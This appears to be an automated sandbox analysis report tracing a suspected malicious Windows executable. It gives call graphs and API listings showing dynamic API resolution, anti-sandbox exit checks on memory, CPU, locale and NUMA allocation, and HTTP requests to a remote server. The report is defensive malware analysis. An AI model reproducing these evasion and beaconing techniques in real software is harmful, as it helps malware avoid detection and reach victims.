bfec7 26865->26879 26866->26865 26871 bfea5 lstrcpy 26866->26871 26867 bfd4d StrCmpCA 26869 bfd60 Sleep 26867->26869 26876 bfd75 26867->26876 26868 bf64a lstrcpy 26868->26917 26869->26912 26870 bfa58 lstrlen 26870->26912 26871->26865 26872 bfe4a lstrlen 26886 bfe64 26872->26886 26873->26872 26874 bfe42 lstrcpy 26873->26874 26874->26872 26875 bf89e lstrcpy 26875->26912 26877 bfd94 lstrlen 26876->26877 26881 bfd8c lstrcpy 26876->26881 26888 bfdae 26877->26888 26878 bf76f lstrcpy 26878->26912 26880 bfee7 lstrlen 26879->26880 26883 bfedf lstrcpy 26879->26883 26884 bff01 26880->26884 26881->26877 26882 bfbb8 lstrcpy 26882->26912 26883->26880 26893 bff21 26884->26893 26894 bff19 lstrcpy 26884->26894 26885 bfa89 lstrcpy 26885->26912 26887 bfdce lstrlen 26886->26887 26889 bfe7c lstrcpy 26886->26889 26901 bfde8 26887->26901 26888->26887 26898 bfdc6 lstrcpy 26888->26898 26889->26887 26890 bf791 lstrcpy 26890->26912 26892 bf8cd lstrcpy 26892->26917 26895 a1610 4 API calls 26893->26895 26894->26893 26919 bfe13 26895->26919 26896 bfaab lstrcpy 26896->26912 26897 bf698 lstrcpy 26897->26917 26898->26887 26899 a1530 8 API calls 26899->26912 26900 bfbe7 lstrcpy 26900->26917 26903 bfe08 26901->26903 26904 bfe00 lstrcpy 26901->26904 26902 bee90 28 API calls 26902->26912 26905 a1610 4 API calls 26903->26905 26904->26903 26905->26919 26906 bf7e2 lstrcpy 26906->26912 26907 bf924 lstrcpy 26907->26917 26908 bf99e StrCmpCA 26908->26863 26908->26917 26909 bfafc lstrcpy 26909->26912 26910 bfc3e lstrcpy 26910->26917 26911 bfcb8 StrCmpCA 26911->26867 26911->26917 26912->26852 26912->26853 26912->26854 26912->26855 26912->26856 26912->26859 26912->26862 26912->26863 26912->26864 26912->26867 26912->26870 26912->26875 26912->26878 26912->26882 26912->26885 26912->26890 26912->26892 26912->26896 26912->26899 26912->26900 26912->26902 26912->26906 26912->26909 26912->26917 26913 bf9cb lstrcpy 26913->26917 26914 bfce9 lstrcpy 26914->26917 26915 bee90 28 API calls 26915->26917 26916 bfa19 lstrcpy 26916->26917 26917->26857 26917->26858 26917->26860 26917->26861 26917->26863 26917->26867 26917->26868 26917->26897 26917->26907 26917->26908 26917->26910 26917->26911 26917->26912 26917->26913 26917->26914 26917->26915 26917->26916 26918 bfd3a lstrcpy 26917->26918 26918->26917 26919->25943 26921 c278c GetVolumeInformationA 26920->26921 26922 c2785 26920->26922 26923 c27ec GetProcessHeap RtlAllocateHeap 26921->26923 26922->26921 26925 c2826 wsprintfA 26923->26925 26926 c2822 26923->26926 26925->26926 27143 c71e0 26926->27143 26930 a4c70 26929->26930 26931 a4c85 26930->26931 26932 a4c7d lstrcpy 26930->26932 27147 a4bc0 26931->27147 26932->26931 26934 a4c90 26935 a4ccc lstrcpy 26934->26935 26936 a4cd8 26934->26936 26935->26936 26937 a4cff lstrcpy 26936->26937 26938 a4d0b 26936->26938 26937->26938 26939 a4d2f lstrcpy 26938->26939 26940 a4d3b 26938->26940 26939->26940 26941 a4d6d lstrcpy 26940->26941 26942 a4d79 26940->26942 26941->26942 26943 a4dac InternetOpenA StrCmpCA 26942->26943 26944 a4da0 lstrcpy 26942->26944 26945 a4de0 26943->26945 26944->26943 26946 a54b8 InternetCloseHandle CryptStringToBinaryA 26945->26946 27151 c3e70 26945->27151 26947 a54e8 LocalAlloc 26946->26947 26957 a55d8 26946->26957 26949 a54ff CryptStringToBinaryA 26947->26949 26947->26957 26950 a5529 lstrlen 26949->26950 26951 a5517 LocalFree 26949->26951 26952 a553d 26950->26952 26951->26957 26954 a5563 lstrlen 26952->26954 26955 a5557 lstrcpy 26952->26955 26953 a4dfa 26956 a4e23 lstrcpy lstrcat 26953->26956 26958 a4e38 26953->26958 26960 a557d 26954->26960 26955->26954 26956->26958 26957->25972 26959 a4e5a lstrcpy 26958->26959 26961 a4e62 26958->26961 26959->26961 26962 a558f lstrcpy lstrcat 26960->26962 26963 a55a2 26960->26963 26964 a4e71 lstrlen 26961->26964 26962->26963 26965 a55d1 26963->26965 26967 a55c9 lstrcpy 26963->26967 26966 a4e89 26964->26966 26965->26957 26968 a4e95 lstrcpy lstrcat 26966->26968 26969 a4eac 26966->26969 26967->26965 26968->26969 26970 a4ed5 26969->26970 26971 a4ecd lstrcpy 26969->26971 26972 a4edc lstrlen 26970->26972 26971->26970 26973 a4ef2 26972->26973 26974 a4efe lstrcpy lstrcat 26973->26974 26975 a4f15 26973->26975 26974->26975 26976 a4f36 lstrcpy 26975->26976 26977 a4f3e 26975->26977 26976->26977 26978 a4f65 lstrcpy lstrcat 26977->26978 26979 a4f7b 26977->26979 26978->26979 26980 a4fa4 26979->26980 26981 a4f9c lstrcpy 26979->26981 26982 a4fab lstrlen 26980->26982 26981->26980 26983 a4fc1 26982->26983 26984 a4fcd lstrcpy lstrcat 26983->26984 26985 a4fe4 26983->26985 26984->26985 26986 a500d 26985->26986 26987 a5005 lstrcpy 26985->26987 26988 a5014 lstrlen 26986->26988 26987->26986 26989 a502a 26988->26989 26990 a5036 lstrcpy lstrcat 26989->26990 26991 a504d 26989->26991 26990->26991 26992 a5079 26991->26992 26993 a5071 lstrcpy 26991->26993 26994 a5080 lstrlen 26992->26994 26993->26992 26995 a509b 26994->26995 26996 a50ac lstrcpy lstrcat 26995->26996 26997 a50bc 26995->26997 26996->26997 26998 a50da lstrcpy lstrcat 26997->26998 26999 a50ed 26997->26999 26998->26999 27000 a510b lstrcpy 26999->27000 27001 a5113 26999->27001 27000->27001 27002 a5121 InternetConnectA 27001->27002 27002->26946 27003 a5150 HttpOpenRequestA 27002->27003 27004 a518b 27003->27004 27005 a54b1 InternetCloseHandle 27003->27005 27158 c7310 lstrlen 27004->27158 27005->26946 27009 a51a4 27166 c72c0 27009->27166 27012 c7280 lstrcpy 27013 a51c0 27012->27013 27014 c7310 3 API calls 27013->27014 27015 a51d5 27014->27015 27016 c7280 lstrcpy 27015->27016 27017 a51de 27016->27017 27018 c7310 3 API calls 27017->27018 27019 a51f4 27018->27019 27020 c7280 lstrcpy 27019->27020 27021 a51fd 27020->27021 27022 c7310 3 API calls 27021->27022 27023 a5213 27022->27023 27024 c7280 lstrcpy 27023->27024 27025 a521c 27024->27025 27026 c7310 3 API calls 27025->27026 27027 a5231 27026->27027 27028 c7280 lstrcpy 27027->27028 27029 a523a 27028->27029 27030 c72c0 2 API calls 27029->27030 27031 a524d 27030->27031 27032 c7280 lstrcpy 27031->27032 27033 a5256 27032->27033 27034 c7310 3 API calls 27033->27034 27035 a526b 27034->27035 27036 c7280 lstrcpy 27035->27036 27037 a5274 27036->27037 27038 c7310 3 API calls 27037->27038 27039 a5289 27038->27039 27040 c7280 lstrcpy 27039->27040 27041 a5292 27040->27041 27042 c72c0 2 API calls 27041->27042 27043 a52a5 27042->27043 27044 c7280 lstrcpy 27043->27044 27045 a52ae 27044->27045 27046 c7310 3 API calls 27045->27046 27047 a52c3 27046->27047 27048 c7280 lstrcpy 27047->27048 27049 a52cc 27048->27049 27050 c7310 3 API calls 27049->27050 27051 a52e2 27050->27051 27052 c7280 lstrcpy 27051->27052 27053 a52eb 27052->27053 27054 c7310 3 API calls 27053->27054 27055 a5301 27054->27055 27056 c7280 lstrcpy 27055->27056 27057 a530a 27056->27057 27058 c7310 3 API calls 27057->27058 27059 a531f 27058->27059 27060 c7280 lstrcpy 27059->27060 27061 a5328 27060->27061 27062 c72c0 2 API calls 27061->27062 27063 a533b 27062->27063 27064 c7280 lstrcpy 27063->27064 27065 a5344 27064->27065 27066 a537c 27065->27066 27067 a5370 lstrcpy 27065->27067 27068 c72c0 2 API calls 27066->27068 27067->27066 27069 a538a 27068->27069 27070 c72c0 2 API calls 27069->27070 27071 a5397 27070->27071 27072 c7280 lstrcpy 27071->27072 27073 a53a1 27072->27073 27074 a53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27073->27074 27075 a549c InternetCloseHandle 27074->27075 27079 a53f2 27074->27079 27077 a54ae 27075->27077 27076 a53fd lstrlen 27076->27079 27077->27005 27078 a542e lstrcpy lstrcat 27078->27079 27079->27075 27079->27076 27079->27078 27080 a5473 27079->27080 27081 a546b lstrcpy 27079->27081 27082 a547a InternetReadFile 27080->27082 27081->27080 27082->27075 27082->27079 27084 b8ccd 27083->27084 27085 b8cc6 ExitProcess 27083->27085 27086 b8ee2 27084->27086 27087 b8e88 lstrlen 27084->27087 27088 b8e6f StrCmpCA 27084->27088 27089 b8d06 lstrlen 27084->27089 27090 b8d84 StrCmpCA 27084->27090 27091 b8da4 StrCmpCA 27084->27091 27092 b8d5a lstrlen 27084->27092 27093 b8dbd StrCmpCA 27084->27093 27094 b8ddd StrCmpCA 27084->27094 27095 b8dfd StrCmpCA 27084->27095 27096 b8e1d StrCmpCA 27084->27096 27097 b8e3d StrCmpCA 27084->27097 27098 b8d30 lstrlen 27084->27098 27099 b8e56 StrCmpCA 27084->27099 27100 b8ebb lstrcpy 27084->27100 27086->25974 27087->27084 27088->27084 27089->27084 27090->27084 27091->27084 27092->27084 27093->27084 27094->27084 27095->27084 27096->27084 27097->27084 27098->27084 27099->27084 27100->27084 27101->25980 27102->25982 27103->25988 27104->25990 27105->25996 27106->25998 27107->26004 27108->26008 27109->26014 27110->26016 27111->26020 27112->26034 27113->26038 27114->26037 27115->26033 27116->26037 27117->26053 27118->26039 27119->26043 27120->26044 27121->26050 27122->26055 27123->26057 27124->26064 27125->26070 27126->26092 27127->26095 27128->26094 27129->26090 27130->26094 27131->26104 27134 a161f 27133->27134 27135 a162b lstrcpy 27134->27135 27136 a1633 27134->27136 27135->27136 27137 a164d lstrcpy 27136->27137 27138 a1655 27136->27138 27137->27138 27139 a166f lstrcpy 27138->27139 27140 a1677 27138->27140 27139->27140 27141 a1699 27140->27141 27142 a1691 lstrcpy 27140->27142 27141->26826 27142->27141 27144 c71e6 27143->27144 27145 c71fc lstrcpy 27144->27145 27146 c2860 27144->27146 27145->27146 27146->25969 27148 a4bd0 27147->27148 27148->27148 27149 a4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27148->27149 27150 a4c41 27149->27150 27150->26934 27152 c3e83 27151->27152 27153 c3e9f lstrcpy 27152->27153 27154 c3eab 27152->27154 27153->27154 27155 c3ecd lstrcpy 27154->27155 27156 c3ed5 GetSystemTime 27154->27156 27155->27156 27157 c3ef3 27156->27157 27157->26953 27160 c732d 27158->27160 27159 a519b 27162 c7280 27159->27162 27160->27159 27161 c733d lstrcpy lstrcat 27160->27161 27161->27159 27163 c728c 27162->27163 27164 c72b4 27163->27164 27165 c72ac lstrcpy 27163->27165 27164->27009 27165->27164 27168 c72dc 27166->27168 27167 a51b7 27167->27012 27168->27167 27169 c72ed lstrcpy lstrcat 27168->27169 27169->27167 27180 b4c77 295 API calls 27202 c31f0 GetSystemInfo wsprintfA 27181 c8471 122 API calls 2 library calls

                                    Executed Functions

                                    Function 000A4C50 Relevance: 114.6, APIs: 61, Strings: 4, Instructions: 807stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A4C7F
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4CD2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4D05
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4D35
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4D73
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A4DA6
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A4DB6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$x$
                                    • API String ID: 2041821634-9601006
                                    • Opcode ID: 92013534c95fc20b49f2a6fff8efd69d3580100824264be5dca8a11ee7fcc496
                                    • Instruction ID: ece7e787456e9b905165f04b551bd6c21130697834929c5a31410a3c2f6a0b5b
                                    • Opcode Fuzzy Hash: 92013534c95fc20b49f2a6fff8efd69d3580100824264be5dca8a11ee7fcc496
                                    • Instruction Fuzzy Hash: 25527E31E016169FDB21EFE8DC49BDEB7B9AF45301F044029F905AB252DB74ED428BA1
                                    Function 000C6390 Relevance: 61.5, APIs: 32, Strings: 3, Instructions: 218libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2125 c6390-c63bd GetPEB 2126 c65c3-c6623 LoadLibraryA * 5 2125->2126 2127 c63c3-c65be call c62f0 GetProcAddress * 20 2125->2127 2129 c6638-c663f 2126->2129 2130 c6625-c6633 GetProcAddress 2126->2130 2127->2126 2132 c666c-c6673 2129->2132 2133 c6641-c6667 GetProcAddress * 2 2129->2133 2130->2129 2134 c6688-c668f 2132->2134 2135 c6675-c6683 GetProcAddress 2132->2135 2133->2132 2137 c66a4-c66ab 2134->2137 2138 c6691-c669f GetProcAddress 2134->2138 2135->2134 2139 c66ad-c66d2 GetProcAddress * 2 2137->2139 2140 c66d7-c66da 2137->2140 2138->2137 2139->2140
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E60738), ref: 000C63E9
                                    • GetProcAddress.KERNEL32(75900000,00E605E8), ref: 000C6402
                                    • GetProcAddress.KERNEL32(75900000,00E607E0), ref: 000C641A
                                    • GetProcAddress.KERNEL32(75900000,00E60588), ref: 000C6432
                                    • GetProcAddress.KERNEL32(75900000,00E68AE0), ref: 000C644B
                                    • GetProcAddress.KERNEL32(75900000,00E56480), ref: 000C6463
                                    • GetProcAddress.KERNEL32(75900000,00E56280), ref: 000C647B
                                    • GetProcAddress.KERNEL32(75900000,00E60720), ref: 000C6494
                                    • GetProcAddress.KERNEL32(75900000,00E607B0), ref: 000C64AC
                                    • GetProcAddress.KERNEL32(75900000,00E60630), ref: 000C64C4
                                    • GetProcAddress.KERNEL32(75900000,00E60648), ref: 000C64DD
                                    • GetProcAddress.KERNEL32(75900000,00E56560), ref: 000C64F5
                                    • GetProcAddress.KERNEL32(75900000,00E607F8), ref: 000C650D
                                    • GetProcAddress.KERNEL32(75900000,00E60828), ref: 000C6526
                                    • GetProcAddress.KERNEL32(75900000,00E56580), ref: 000C653E
                                    • GetProcAddress.KERNEL32(75900000,00E60840), ref: 000C6556
                                    • GetProcAddress.KERNEL32(75900000,00E60600), ref: 000C656F
                                    • GetProcAddress.KERNEL32(75900000,00E56540), ref: 000C6587
                                    • GetProcAddress.KERNEL32(75900000,00E60618), ref: 000C659F
                                    • GetProcAddress.KERNEL32(75900000,00E564C0), ref: 000C65B8
                                    • LoadLibraryA.KERNEL32(00E605A0,?,?,?,000C1C03), ref: 000C65C9
                                    • LoadLibraryA.KERNEL32(00E60678,?,?,?,000C1C03), ref: 000C65DB
                                    • LoadLibraryA.KERNEL32(00E60690,?,?,?,000C1C03), ref: 000C65ED
                                    • LoadLibraryA.KERNEL32(00E606D8,?,?,?,000C1C03), ref: 000C65FE
                                    • LoadLibraryA.KERNEL32(00E606A8,?,?,?,000C1C03), ref: 000C6610
                                    • GetProcAddress.KERNEL32(75070000,00E60558), ref: 000C662D
                                    • GetProcAddress.KERNEL32(75FD0000,00E60570), ref: 000C6649
                                    • GetProcAddress.KERNEL32(75FD0000,00E68EF8), ref: 000C6661
                                    • GetProcAddress.KERNEL32(75A50000,00E68FA0), ref: 000C667D
                                    • GetProcAddress.KERNEL32(74E50000,00E56500), ref: 000C6699
                                    • GetProcAddress.KERNEL32(76E80000,00E68B50), ref: 000C66B5
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 000C66CC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: @e$NtQueryInformationProcess$`e
                                    • API String ID: 2238633743-3649666148
                                    • Opcode ID: f20b94e42e5f5b273f179ffd7e1368133ed1692683aa192bfa53121a3be8b288
                                    • Instruction ID: 7ebc08535502ba9e5541d7f591a2cecd98d8d71b2a3d2bf512587fb10ab2f47a
                                    • Opcode Fuzzy Hash: f20b94e42e5f5b273f179ffd7e1368133ed1692683aa192bfa53121a3be8b288
                                    • Instruction Fuzzy Hash: CFA129B5E12200AFD754DF69FD8CA263BB9F788642350851BF956D3364DA34AC80DF60
                                    Function 000C1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2141 c1bf0-c1c0b call a2a90 call c6390 2146 c1c0d 2141->2146 2147 c1c1a-c1c27 call a2930 2141->2147 2148 c1c10-c1c18 2146->2148 2151 c1c29-c1c2f lstrcpy 2147->2151 2152 c1c35-c1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 c1c6d-c1c7b GetSystemInfo 2152->2156 2157 c1c65-c1c67 ExitProcess 2152->2157 2158 c1c7d-c1c7f ExitProcess 2156->2158 2159 c1c85-c1ca0 call a1030 call a10c0 GetUserDefaultLangID 2156->2159 2164 c1cb8-c1cca call c2ad0 call c3e10 2159->2164 2165 c1ca2-c1ca9 2159->2165 2171 c1ccc-c1cde call c2a40 call c3e10 2164->2171 2172 c1ce7-c1d06 lstrlen call a2930 2164->2172 2165->2164 2166 c1cb0-c1cb2 ExitProcess 2165->2166 2171->2172 2183 c1ce0-c1ce1 ExitProcess 2171->2183 2178 c1d08-c1d0d 2172->2178 2179 c1d23-c1d40 lstrlen call a2930 2172->2179 2178->2179 2181 c1d0f-c1d11 2178->2181 2186 c1d5a-c1d7b call c2ad0 lstrlen call a2930 2179->2186 2187 c1d42-c1d44 2179->2187 2181->2179 2184 c1d13-c1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 c1d7d-c1d7f 2186->2193 2194 c1d9a-c1db4 lstrlen call a2930 2186->2194 2187->2186 2189 c1d46-c1d54 lstrcpy lstrcat 2187->2189 2189->2186 2193->2194 2195 c1d81-c1d85 2193->2195 2199 c1dce-c1deb call c2a40 lstrlen call a2930 2194->2199 2200 c1db6-c1db8 2194->2200 2195->2194 2197 c1d87-c1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 c1ded-c1def 2199->2206 2207 c1e0a-c1e0f 2199->2207 2200->2199 2201 c1dba-c1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 c1df1-c1df5 2206->2208 2209 c1e16-c1e22 call a2930 2207->2209 2210 c1e11 call a2a20 2207->2210 2208->2207 2211 c1df7-c1e04 lstrcpy lstrcat 2208->2211 2215 c1e24-c1e26 2209->2215 2216 c1e30-c1e66 call a2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 c1e28-c1e2a lstrcpy 2215->2217 2228 c1e8c-c1ea0 CreateEventA call c1b20 call bffd0 2216->2228 2229 c1e68-c1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 c1ea5-c1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                    APIs
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60738), ref: 000C63E9
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E605E8), ref: 000C6402
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E607E0), ref: 000C641A
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60588), ref: 000C6432
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E68AE0), ref: 000C644B
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E56480), ref: 000C6463
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E56280), ref: 000C647B
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60720), ref: 000C6494
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E607B0), ref: 000C64AC
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60630), ref: 000C64C4
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E60648), ref: 000C64DD
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E56560), ref: 000C64F5
                                      • Part of subcall function 000C6390: GetProcAddress.KERNEL32(75900000,00E607F8), ref: 000C650D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C1C2F
                                    • ExitProcess.KERNEL32 ref: 000C1C67
                                    • GetSystemInfo.KERNEL32(?), ref: 000C1C71
                                    • ExitProcess.KERNEL32 ref: 000C1C7F
                                      • Part of subcall function 000A1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A1046
                                      • Part of subcall function 000A1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 000A104D
                                      • Part of subcall function 000A1030: ExitProcess.KERNEL32 ref: 000A1058
                                      • Part of subcall function 000A10C0: GlobalMemoryStatusEx.KERNEL32 ref: 000A10EA
                                      • Part of subcall function 000A10C0: ExitProcess.KERNEL32 ref: 000A1114
                                    • GetUserDefaultLangID.KERNEL32 ref: 000C1C8F
                                    • ExitProcess.KERNEL32 ref: 000C1CB2
                                    • ExitProcess.KERNEL32 ref: 000C1CE1
                                    • lstrlen.KERNEL32(00E68BB0), ref: 000C1CEE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1D15
                                    • lstrcat.KERNEL32(00000000,00E68BB0), ref: 000C1D1D
                                    • lstrlen.KERNEL32(000D4B98), ref: 000C1D28
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1D48
                                    • lstrcat.KERNEL32(00000000,000D4B98), ref: 000C1D54
                                    • lstrlen.KERNEL32(00000000), ref: 000C1D63
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1D89
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1D94
                                    • lstrlen.KERNEL32(000D4B98), ref: 000C1D9F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1DBC
                                    • lstrcat.KERNEL32(00000000,000D4B98), ref: 000C1DC8
                                    • lstrlen.KERNEL32(00000000), ref: 000C1DD7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C1DF9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000C1E04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                    • String ID:
                                    • API String ID: 3366406952-0
                                    • Opcode ID: 437592b38c427d10af359013a6fff78d472cbd58177f59b604a931fccf4f786c
                                    • Instruction ID: 9c880cb082147789f0dbc997809b985b8d30eb24e6e065d54ed3903151e328aa
                                    • Opcode Fuzzy Hash: 437592b38c427d10af359013a6fff78d472cbd58177f59b604a931fccf4f786c
                                    • Instruction Fuzzy Hash: 06716231902215AFDB61BBB4EC8DFEE37B9AF56701F04402AF906D61A2DF709C418B61
                                    Function 000A6C40 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 229networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
